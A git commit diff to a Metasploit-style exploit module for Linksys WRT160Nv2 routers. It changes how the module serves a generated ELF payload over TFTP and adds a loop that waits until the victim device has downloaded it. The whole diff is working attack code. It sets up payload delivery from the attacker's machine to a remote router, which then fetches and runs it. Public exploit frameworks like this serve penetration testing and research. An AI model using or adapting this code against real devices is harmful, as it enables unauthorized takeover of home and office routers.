tftp download check

m-1-k-3 · m-1-k-3 · commit aee5b02f65f3 · 2013-05-19T18:45:01.000+02:00
diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb
@@ -146,14 +146,13 @@ def exploit
 
 		#thx to Juan for his awesome work on the mipsel elf support
 		@pl = generate_payload_exe
-		@elf_sent = false
 
 		#
 		# start our server
 		#
 		print_status("#{rhost}:#{rport} - Starting up our TFTP service")
 		@tftp = Rex::Proto::TFTP::Server.new
-		@tftp.register_file(downfile,@pl)
+		@tftp.register_file(downfile,@pl,true)
 		@tftp.start
 
 		#
@@ -170,9 +169,13 @@ def exploit
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
 
-		# wait for payload download
-		print_status("#{rhost}:#{rport} - Giving #{datastore['DELAY']} seconds to the Linksys device to download the payload")
-		select(nil, nil, nil, datastore['DELAY'])
+                # wait for payload download
+		if (datastore['DOWNHOST'])
+			print_status("#{rhost}:#{rport} - Giving #{datastore['DELAY']} seconds to the Linksys device to download the payload")
+			select(nil, nil, nil, datastore['DELAY'])
+		else
+			wait_linux_payload
+		end
 		register_file_for_cleanup("/tmp/#{filename}")
 
 		#
@@ -196,4 +199,19 @@ def exploit
 		end
 
 	end
+
+	# wait for the data to be sent
+	def wait_linux_payload
+		print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+
+		waited = 0
+		while (not @tftp.files.length == 0)
+			puts @tftp.files.length
+			select(nil, nil, nil, 1)
+			waited += 1
+			if (waited > datastore['DELAY'])
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
+			end
+		end
+	end
 end
